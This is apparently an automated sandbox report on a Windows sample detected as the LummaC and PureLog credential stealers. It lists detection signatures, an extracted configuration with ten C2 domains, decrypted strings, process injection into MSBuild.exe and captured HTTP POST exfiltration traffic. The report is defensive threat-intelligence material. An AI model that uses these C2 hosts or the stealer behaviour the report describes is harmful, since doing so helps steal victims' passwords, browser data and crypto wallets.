Edit tour

Windows Analysis Report
86KZvDaOZR.exe

Overview

General Information

Sample name:	86KZvDaOZR.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	95a8f7184c282154b85d56e37d1cb08c00fc2f6819e5b36ecf2a267c3385bf89
Analysis ID:	1448403
MD5:	3c2c9ee4db3df5b210a523088a610da8
SHA1:	17e7e65a549333376f65fe7920e8106682f6f070
SHA256:	95a8f7184c282154b85d56e37d1cb08c00fc2f6819e5b36ecf2a267c3385bf89
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected PureLog Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

86KZvDaOZR.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\86KZvDaOZR.exe" MD5: 3C2C9EE4DB3DF5B210A523088A610DA8)

MSBuild.exe (PID: 3948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["relaxtionflouwerwi.shop", "deprivedrinkyfaiir.shop", "detailbaconroollyws.shop", "detailbaconroollyws.shop", "messtimetabledkolvk.shop", "considerrycurrentyws.shop", "understanndtytonyguw.shop", "patternapplauderw.shop", "horsedwollfedrwos.shop", "corruptioncrackywosp.shop"], "Build id": "sJAs2x--pizdatiylog"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
86KZvDaOZR.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: 86KZvDaOZR.exe PID: 7084	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 3948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.86KZvDaOZR.exe.180000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.21.92.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3948, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 86KZvDaOZR.exe

Avira: detected

Found malware configuration

Source: 86KZvDaOZR.exe.7084.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["relaxtionflouwerwi.shop", "deprivedrinkyfaiir.shop", "detailbaconroollyws.shop", "detailbaconroollyws.shop", "messtimetabledkolvk.shop", "considerrycurrentyws.shop", "understanndtytonyguw.shop", "patternapplauderw.shop", "horsedwollfedrwos.shop", "corruptioncrackywosp.shop"], "Build id": "sJAs2x--pizdatiylog"}

Multi AV Scanner detection for submitted file

Source: 86KZvDaOZR.exe	ReversingLabs: Detection: 50%
Source: 86KZvDaOZR.exe	Virustotal: Detection: 59%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 86KZvDaOZR.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: relaxtionflouwerwi.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: deprivedrinkyfaiir.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: detailbaconroollyws.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: messtimetabledkolvk.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: considerrycurrentyws.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: understanndtytonyguw.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: patternapplauderw.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: horsedwollfedrwos.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: corruptioncrackywosp.shop
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2018514045.0000000002A72000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sJAs2x--pizdatiylog

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5DD20 CryptReleaseContext,	0_2_6CF5DD20
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5DEE0 CryptReleaseContext,	0_2_6CF5DEE0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5DE00 CryptGenRandom,__CxxThrowException@8,	0_2_6CF5DE00
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5D9D0 CryptAcquireContextA,GetLastError,	0_2_6CF5D9D0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	0_2_6CF5DBB0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF835E0 CryptReleaseContext,	0_2_6CF835E0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5D7F0 CryptReleaseContext,	0_2_6CF5D7F0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF5D7D3 CryptReleaseContext,	0_2_6CF5D7D3

Source: 86KZvDaOZR.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: 86KZvDaOZR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 86KZvDaOZR.exe, 00000000.00000002.2023803263.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000004118000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 86KZvDaOZR.exe, 00000000.00000002.2023803263.000000000537A000.00000004.08000000.00040000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000003EBE000.00000004.00000800.00020000.00000000.sdmp, 86KZvDaOZR.exe, 00000000.00000002.2018864715.0000000004049000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102B70
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102A60
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102D90
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102D89
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102C78
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102C78
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102C80
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_05101672
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_05101678
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102E98
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_0510B098
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_0510B0A0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102B69
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then jmp 0510AC8Ah	0_2_0510ABD3
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then jmp 0510AC8Ah	0_2_0510ABD8
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_05102A58

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: relaxtionflouwerwi.shop
Source: Malware configuration extractor	URLs: deprivedrinkyfaiir.shop
Source: Malware configuration extractor	URLs: detailbaconroollyws.shop
Source: Malware configuration extractor	URLs: detailbaconroollyws.shop
Source: Malware configuration extractor	URLs: messtimetabledkolvk.shop
Source: Malware configuration extractor	URLs: considerrycurrentyws.shop
Source: Malware configuration extractor	URLs: understanndtytonyguw.shop
Source: Malware configuration extractor	URLs: patternapplauderw.shop
Source: Malware configuration extractor	URLs: horsedwollfedrwos.shop
Source: Malware configuration extractor	URLs: corruptioncrackywosp.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 60Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20573Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7094Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1268Host: corruptioncrackywosp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 593089Host: corruptioncrackywosp.shop

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: corruptioncrackywosp.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: corruptioncrackywosp.shop

Source: 86KZvDaOZR.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 86KZvDaOZR.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 86KZvDaOZR.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2147987348.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://corruptioncrackywosp.shop/
Source: MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://corruptioncrackywosp.shop/api
Source: MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://corruptioncrackywosp.shop/apiD
Source: MSBuild.exe, 00000002.00000002.2148494925.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://corruptioncrackywosp.shop/apisS
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://corruptioncrackywosp.shop:443/apiirusProductWindows
Source: 86KZvDaOZR.exe	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.10:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042D100 OpenClipboard,GetWindowInfo,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042D100

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042D100 OpenClipboard,GetWindowInfo,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042D100

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0042D2F0 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0042D2F0

Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF2B6B0	0_2_6CF2B6B0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF7AC29	0_2_6CF7AC29
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF22D70	0_2_6CF22D70
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF54EE0	0_2_6CF54EE0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF44970	0_2_6CF44970
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF44AC0	0_2_6CF44AC0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF70B89	0_2_6CF70B89
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF08B30	0_2_6CF08B30
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF44550	0_2_6CF44550
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF7A54D	0_2_6CF7A54D
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF06650	0_2_6CF06650
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF0A7E0	0_2_6CF0A7E0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF0C7B0	0_2_6CF0C7B0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF1A0C0	0_2_6CF1A0C0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF563B0	0_2_6CF563B0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF62310	0_2_6CF62310
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF61CA0	0_2_6CF61CA0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF43C90	0_2_6CF43C90
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF75DD2	0_2_6CF75DD2
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF55DD0	0_2_6CF55DD0
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF55EB9	0_2_6CF55EB9
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF43E50	0_2_6CF43E50
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF7BFF1	0_2_6CF7BFF1
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF79FFC	0_2_6CF79FFC
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF558D5	0_2_6CF558D5
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF558D7	0_2_6CF558D7
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF55830	0_2_6CF55830
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF7B964	0_2_6CF7B964
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF79AAB	0_2_6CF79AAB
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF43460	0_2_6CF43460
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF55050	0_2_6CF55050
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF55274	0_2_6CF55274
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_6CF43260	0_2_6CF43260
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF8D90	0_2_00FF8D90
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FFA658	0_2_00FFA658
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF1320	0_2_00FF1320
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF1310	0_2_00FF1310
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF0F70	0_2_00FF0F70
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_00FF0F62	0_2_00FF0F62
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_05100040	0_2_05100040
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_05860EB3	0_2_05860EB3
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_058626F8	0_2_058626F8
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_05860930	0_2_05860930
Source: C:\Users\user\Desktop\86KZvDaOZR.exe	Code function: 0_2_058626DD	0_2_058626DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004202A0	2_2_004202A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A420	2_2_0040A420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00420760	2_2_00420760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043AA40	2_2_0043AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00404A10	2_2_00404A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041FA1E	2_2_0041FA1E
